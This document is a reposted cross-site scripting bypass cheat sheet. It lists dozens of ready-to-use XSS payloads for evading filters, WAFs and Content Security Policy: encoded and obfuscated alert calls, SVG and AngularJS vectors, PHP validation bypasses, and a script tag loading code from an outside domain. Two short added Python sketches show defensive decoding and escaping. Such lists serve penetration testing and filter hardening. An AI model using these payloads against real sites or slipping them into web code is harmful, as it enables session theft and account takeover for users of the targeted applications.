xss-Bypass (From xss-cheat-sheet)

Bypass

  • Mixed Case
<Svg OnLoad=alert(1)>
<Script>alert(1)</Script>
  • Unclosed Tags (bypass using unclosed tags)

Use in HTML injections to avoid filtering based in the presence of both lower than (<) and
greater than (>) signs. It requires a native greater than sign in source code after input
reflection.

<svg onload=alert(1)//
<svg onload="alert(1)"
  • Uppercase XSS

Use when the application reflects input in uppercase. Replace "&" with "%26" and "#" with
"%23" in the URL.

<SVG ONLOAD=&#97&#108&#101&#114&#116(1)>
    (&#97;&#108;&#101;&#114;&#116; decodes to "alert")
<SCRIPT SRC=//BRUTELOGIC.COM.BR/1></SCRIPT>
  • Extra Content for Script Tags

Use when the filter looks for "<script>" or "<script src=..." with some variations but without
checking for other non-required attributes.

<script/x>alert(1)</script>
  • Double Encoded XSS

Use when the application performs double decoding of the input.

%253Csvg%2520o%256Eload%253Dalert%25281%2529%253E
%2522%253E%253Csvg%2520o%256Eload%253Dalert%25281%2529%253E
<svg onload=alert(1)>
"><svg onload=alert(1)>
    (the two encoded payloads above are the double URL-encoded forms of these two vectors)
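Added example, not part of the cheat sheet: a Python sketch of why a second URL decode is a defect, using the first double-encoded vector above as constructed input. It assumes the web framework already URL-decodes the parameter once; the application's extra unquote() is the bug, and the fix is to decode once and encode for the output context.

```python
from html import escape
from urllib.parse import unquote

# Constructed sample input: the double-encoded vector from this section,
# exactly as it would arrive in a query string.
DOUBLE_ENCODED = "%253Csvg%2520o%256Eload%253Dalert%25281%2529%253E"


def decode_once(value: str) -> str:
    """What the framework does: one URL decode of the raw parameter."""
    return unquote(value)


def double_decode(value: str) -> str:
    """The defect: application code calls unquote() again on an already
    decoded value, so %25 -> % and a second round of decoding happens."""
    return unquote(decode_once(value))


def looks_double_encoded(value: str) -> bool:
    """Detection heuristic for logs or a WAF: after one decode the value
    still contains decodable %XX sequences, which legitimate input rarely does."""
    once = decode_once(value)
    return unquote(once) != once


def render_into_html(value: str) -> str:
    """Safe handling: decode exactly once at the boundary, then encode for
    the HTML context the value is written into. No markup survives."""
    return escape(decode_once(value), quote=True)
```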
  • Alert without Parentheses (Strings Only)

Use in an HTML vector or javascript injection when parentheses are not allowed and a
simple alert box is enough.

alert`1`
  • Alert without Parentheses

Use in an HTML vector or javascript injection when parentheses are not allowed and the PoC
needs to return some information from the target.

setTimeout`alert\x28document.domain\x29`
setInterval`alert\x28document.domain\x29`
    (\x28 and \x29 are the hex escapes for "(" and ")")
  • Alert without Parentheses – HTML Entities

Use only in HTML injection when parentheses are not allowed. Replace "&" with "%26" and "#"
with "%23" in the URL.

<svg onload=alert&lpar;1&rpar;>
<svg onload=alert&#40;1&#41>
    (the parentheses are replaced by HTML entities)
  • Alert without Alphabetic Chars

Use when alphabetic characters are not allowed.

The following evaluates to alert(1).

[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\141\154\145\162\164\50\61\51')()
  • Alert Obfuscation

Use to trick several regular expression (regex) filters. It might be combined with previous
alternatives (above). The shortest option “top” can also be replaced by “window”, “parent”,
“self” or “this” depending on context.

(alert)(1)
a=alert,a(1)
[1].find(alert)
top["al"+"ert"](1)
top[/al/.source+/ert/.source](1)
al\u0065rt(1)
top['al\145rt'](1)
top[8680439..toString(30)](1)
  • Alert Alternative – Write & Writeln

Use as an alternative to alert, prompt and confirm.

If used in an HTML vector it can be used as is, but in a JS injection the full "document.write"
form is required. Replace "&" with "%26" and "#" with "%23" in the URL. "write" can be
replaced by "writeln".

write`XSSed!`
write`<img/src/o&#78error=alert&lpar;1)&gt;`
write('\74img/src/o\156error\75alert\501\51\76')
  • Alert Alternative – Open Pseudo-Protocol

Use as an alternative to alert, prompt and confirm.

The tips above also apply here. Only the second one works in Chromium-based browsers, and it
requires <iframe name=0>.

top.open`javas\cript:al\ert\x281\x29`
top.open`javas\cript:al\ert\x281\x29${0}0`
  • Alert Alternative - Eval + URL

Use as an alternative to call alert, prompt and confirm

The first payload is the raw form; the second uses the vector's id attribute value in place of
eval. The URL must contain one of the following, either in the URL path after the PHP extension
or in the URL fragment. The plus sign (+) must be URL-encoded.

<svg onload=eval(" ' "+URL)>
<svg id=eval onload=top[id](" ' "+URL)>
PoC URL must contain one of the following:
=> FILE.php/'/alert(1)//?...
=> #'/alert(1)
  • Alert Alternative - Eval + URL with Template Literal
${alert(1)}<svg onload=eval('`//'+URL)>
  • HTML Injection - Inline Alternative

Use to bypass blacklists.

"onpointerover=alert(1) //
"autofocus onfocusin=alert(1) //
  • Strip-Tags Based Bypass

Use when the filter removes anything between the < and > characters, like PHP's strip_tags()
function. Inline injection.

"o<x>nmouseover=alert<x>(1)//
"autof<x>ocus o<x>nfocus=alert<x>(1)//
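Added example, not part of the cheat sheet: a Python stand-in for PHP's strip_tags() showing why tag stripping does not protect an attribute context, beside the contextual encoding that does. The two vectors above are embedded as constructed input, and the surrounding <input value="..."> markup is an assumed reflection point.

```python
import re
from html import escape

# Constructed samples: the two inline vectors from this section.
VECTORS = [
    '"o<x>nmouseover=alert<x>(1)//',
    '"autof<x>ocus o<x>nfocus=alert<x>(1)//',
]

TAG_RE = re.compile(r"<[^>]*>")


def naive_strip_tags(value: str) -> str:
    """Stand-in for PHP's strip_tags(): drops everything between < and >.
    The <x> fragments vanish and the event handler name is reassembled."""
    return TAG_RE.sub("", value)


def render_attribute_naive(value: str) -> str:
    """Vulnerable pattern: strip tags, then interpolate into an attribute.
    The leading quote in the vector closes value="" early."""
    return f'<input value="{naive_strip_tags(value)}">'


def render_attribute_safe(value: str) -> str:
    """Fixed pattern: encode for the attribute context. Quotes become &quot;
    and angle brackets become &lt; and &gt;, so no stripping is needed."""
    return f'<input value="{escape(value, quote=True)}">'


def breaks_out_of_attribute(markup: str) -> bool:
    """Check: the rendered element should contain exactly the two quotes of
    value="..."; any other literal quote means the value was closed early."""
    return markup.count('"') != 2
```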
  • File Upload Injection – HTML/js GIF Disguise

Use to bypass CSP (Content Security Policy) via file upload. Save all content below as
"xss.gif" or "xss.js" (for strict MIME checking). It can be imported into the target page with
<link rel=import href=xss.gif> (also "xss.js") or <script src=xss.js></script>. It's image/gif
for PHP.

GIF89a=//<script>
alert(1)//</script>;
  • Jump to URL Fragment

Use when you need to hide some characters of your payload that would trigger a WAF, for
example. It makes use of the respective payload format after the URL fragment (#).

eval(URL.slice(-8)) #alert(1)
eval(location.hash.slice(1)) #alert(1)
document.write(decodeURI(location.hash)) #<img/src/onerror=alert(1)>
  • Second Order XSS Injection

Use when your input will be used twice, such as normalized storage in a database followed by
retrieval for later use or insertion into the DOM.

&lt;svg/onload&equals;alert(1)&gt;
  • PHP Spell Checker Bypass

Use to bypass PHP's pspell_new function, which provides a dictionary used to try to guess the
input of a search. A Google-like "Did You Mean" search feature.

<scrpt> confirm(1) </scrpt>
  • Event Origin Bypass for postMessage() XSS

Use when a check for origin can be bypassed in javascript code of target by prepending one
of the allowed origins as a subdomain of the attacking domain that will send the payload.
Example makes use of CrossPwn script (available in Extra section) at localhost.

http://facebook.com.localhost/crosspwn.html?target=//brutelogic.com.br/tests/status.html&msg=<script>alert(1)</script>
  • CSP Bypass (for Whitelisted Google Domains)

Use when there is a CSP (Content Security Policy) that allows execution from these domains.

<script src=//www.google.com/complete/search?client=chrome%26jsonp=alert(1)></script>
<script src=//www.googleapis.com/customsearch/v1?callback=alert(1)></script>
<script src=//ajax.googleapis.com/ajax/libs/angularjs/1.6.0/angular.min.js></script><x ng-app ng-csp>{{$new.constructor('alert(1)')()}}
  • SVG Vectors with Event Handlers

It works on Firefox, but adding attributename=x inside makes it work in Chromium-based browsers
too. "set" can also be replaced by "animate". Use against blacklists.

<svg><set onbegin=alert(1)>
<svg><set end=1 onend=alert(1)>
  • SVG Vectors without Event Handlers

Use to avoid filters looking for event handlers or src, data, etc. Last one is Firefox only,
already URL encoded.

<svg><a><rect width=99% height=99% /><animate attributeName=href to=javascript:alert(1)>
<svg><a><rect width=99% height=99% /><animate attributeName=href values=javascript:alert(1)>
<svg><a><rect width=99% height=99% /><animate attributeName=href to=0 from=javascript:alert(1)>
<svg><use xlink:href=data:image/svg%2Bxml;base64,PHN2ZyBpZD0ieCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxuczp4bGluaz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluayI%2BPGVtYmVkIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hodG1sIiBzcmM9ImphdmFzY3JpcHQ6YWxlcnQoMSkiLz48L3N2Zz4=%23x>
  • Vectors without Event Handlers

Use as an alternative to event handlers, if they are not allowed. Some require user
interaction as stated in the vector itself (the text is also part of the vector).

<script>alert(1)</script>
<script src=data:,alert(1)>
<iframe src=javascript:alert(1)>
<embed src=javascript:alert(1)>
<a href=javascript:alert(1)>click
<math><brute href=javascript:alert(1)>click
<form action=javascript:alert(1)><input type=submit>
<isindex action=javascript:alert(1) type=submit value=click>
<form><button formaction=javascript:alert(1)>click
<form><input formaction=javascript:alert(1) type=submit value=click>
<form><input formaction=javascript:alert(1) type=image value=click>
<form><input formaction=javascript:alert(1) type=image src=SOURCE>
<isindex formaction=javascript:alert(1) type=submit value=click>
<object data=javascript:alert(1)>
<iframe srcdoc=<svg/o&#x6Eload&equals;alert&lpar;1)&gt;>
<svg><script xlink:href=data:,alert(1) />
<math><brute xlink:href=javascript:alert(1)>click
  • Vectors with Agnostic Event Handlers

Use the following vectors when all known HTML tag names are not allowed.

Any alphabetic character or string can be used in place of "x" as the tag name.

They require user interaction, as stated in their text content (which is also part of the vector).

<x contenteditable onblur=alert(1)>lose focus!
<x onclick=alert(1)>click this!
<x oncopy=alert(1)>copy this!
<x oncontextmenu=alert(1)>right click this!
<x onauxclick=alert(1)>right click this!
<x oncut=alert(1)>copy this!
<x ondblclick=alert(1)>double click this!
<x ondrag=alert(1)>drag this!
<x contenteditable onfocus=alert(1)>focus this!
<x contenteditable oninput=alert(1)>input here!
<x contenteditable onkeydown=alert(1)>press any key!
<x contenteditable onkeypress=alert(1)>press any key!
<x contenteditable onkeyup=alert(1)>press any key!
<x onmousedown=alert(1)>click this!
<x onmouseenter=alert(1)>hover this
<x onmousemove=alert(1)>hover this!
<x onmouseout=alert(1)>hover this!
<x onmouseover=alert(1)>hover this!
<x onmouseup=alert(1)>click this!
<x contenteditable onpaste=alert(1)>paste here!
<x onpointercancel=alert(1)>hover this!
<x onpointerdown=alert(1)>hover this!
<x onpointerenter=alert(1)>hover this!
<x onpointerleave=alert(1)>hover this!
<x onpointermove=alert(1)>hover this!
<x onpointerout=alert(1)>hover this!
<x onpointerover=alert(1)>hover this!
<x onpointerup=alert(1)>hover this!
<x onpointerrawupdate=alert(1)>hover this!
  • Mixed Context Reflection Entity Bypass

Use to turn a filtered reflection in a script block into actual valid js code. It requires the
input to be reflected both in HTML and javascript contexts, in that order, and close to each
other. The svg tag will make the next script block be parsed in a way that even if single
quotes become encoded as an HTML entity such as &#39; in the reflection (sanitized), it will
still be valid for breaking out of the current value and triggering the alert. Vectors for the
following javascript scenarios, respectively: single quote sanitized, single quote fully
escaped, double quote sanitized and double quote fully escaped.

">'-alert(1)-'<svg>
">&#39-alert(1)-&#39<svg>
">alert(1)-"<svg>
"&#34>alert(1)-&#34<svg>
  • Strip-My-Script Vector

Use to trick filters that strip the classic and most known XSS vector.

It works as it is and also if <script> gets stripped.

<svg/on<script><script>load=alert(1)//</script>
  • Javascript Alternative Comments

Use when regular javascript comments (//) are not allowed, escaped or removed.

<!--
%0A-->
  • JS Lowercased Input

Use when the target application turns your input into lowercase via javascript. It might also
work for server-side lowercase operations.

<SCRIPT>alert(1)</SCRIPT>
<SCRIPT/SRC=data:,alert(1)>
  • Overlong UTF-8

Use when the target application performs best-fit mapping.

%CA%BA>%EF%BC%9Csvg/onload%EF%BC%9Dalert%EF%BC%881)>
  • Vectors Exclusive for ASP Pages

Use to bypass <[alpha] filtering in .asp pages.

%u003Csvg onload=alert(1)>
%u3008svg onload=alert(2)>
%uFF1Csvg onload=alert(3)>
  • PHP Email Validation Bypass

Use to bypass the FILTER_VALIDATE_EMAIL flag of PHP's filter_var() function.

"><svg/onload=alert(1)>"@x.y
  • PHP URL Validation Bypass

Use to bypass the FILTER_VALIDATE_EMAIL flag of PHP's filter_var() function.

javascript://%250Aalert(1)
  • PHP URL Validation Bypass – Query Required

Use to bypass FILTER_VALIDATE_EMAIL with FILTER_FLAG_QUERY_REQUIRED of PHP’s
filter_var() function.

javascript://%250Aalert(1)//?1
javascript://%250A1?alert(1):0
(with domain filter)
javascript://https://DOMAIN/%250A1?alert(1):0
  • DOM Insertion via Server Side Reflection

Use when input is reflected into the source and cannot execute directly from the reflection,
only once it is inserted into the DOM. Avoids browser filtering and WAFs.

\74svg o\156load\75alert\501\51\76
  • XML-Based Vector for Bypass

Use to bypass browser filtering and WAFs in XML pages.

Prepend "-->" to the payload if the input lands in a comment section, or "]]>" if the input
lands in a CDATA section.

<_:script xmlns:_="http://www.w3.org/1999/xhtml">alert(1)</_:script>
  • Javascript Context - Code Injection (IE11/Edge Bypass)

Use to bypass Microsoft IE11 or Edge when injecting into a javascript context.

';onerror=alert;throw 1//
  • HTML Context - Tag Injection (IE11/Edge XSS Bypass)

Use to bypass their native filter in multi-reflection scenarios.

"'>confirm&lpar;1)</Script><Svg><Script/1='
  • Javascript Pseudo-Protocol Obfuscation

Use to bypass filters looking for javascript:alert(1).

Be sure it can work (pass) with “1” before
adding alert(1) because this very payload might need some extra obfuscation to bypass
filter completely. Last option only works with DOM manipulation of payload (like in
Location Based Payloads or DOM-based XSS). Encode them properly in URLs.

javas&#99ript:1
javascript&colon;1
javascript&#9:1
&#1javascript:1
"javas%0Dcript:1"
%00javascript:1
  • AngularJS Injection (v1.6+) – No Parentheses, Brackets or Quotes

Use to avoid filtering. The first payload avoids parentheses, the second one avoids brackets and
the last vector avoids quotes by using them in the same or in a separate injection point. Encode
properly in URLs.

{{$new.constructor&#40'alert\u00281\u0029'&#41&#40&#41}}
&#123&#123$new.constructor('alert(1)')()&#125&#125
<x ng-init=a='alert(1)'>{{$new.constructor(a)()}}
  • Inside Comments Bypass

Use the vector if anything inside an HTML comment is allowed (regex: /<!----.*---->/).

<!--><svg onload=alert(1)-->
  • Agnostic Event Handlers Vectors – Native Script Based

Vectors with event handlers that can be used with arbitrary tag names, useful to bypass
blacklists. They require some script loaded in the page after the point of injection in the
source code. Keep in mind that using existing tag names like "<b" for the handlers below might
be the only way to trigger them in some scenarios.

<x onafterscriptexecute=alert(1)>
<x onbeforescriptexecute=alert(1)>
  • Agnostic Event Handlers Vectors – CSS3 Based

Vectors with event handlers that can be used with arbitrary tag names, useful to bypass
blacklists. They require CSS in the form of <style> or an imported stylesheet via <link>. The
last four work only in Firefox.

<x onanimationend=alert(1)><style>x{animation:s}@keyframes s{}
<x onanimationstart=alert(1)><style>x{animation:s}@keyframes s{}
<x onwebkitanimationend=alert(1)><style>x{animation:s}@keyframes s{}
<x onwebkitanimationstart=alert(1)><style>x{animation:s}@keyframes s{}
<x ontransitionend=alert(1)><style>*{transition:color 1s}*:hover{color:red}
<x ontransitionrun=alert(1)><style>*{transition:color 1s}*:hover{color:red}
<x ontransitionstart=alert(1)><style>*{transition:color 1s}*:hover{color:red}
<x ontransitioncancel=alert(1)><style>*{transition:color 1s}*:hover{color:red}

Reposted from www.cnblogs.com/l0nmar/p/12810143.html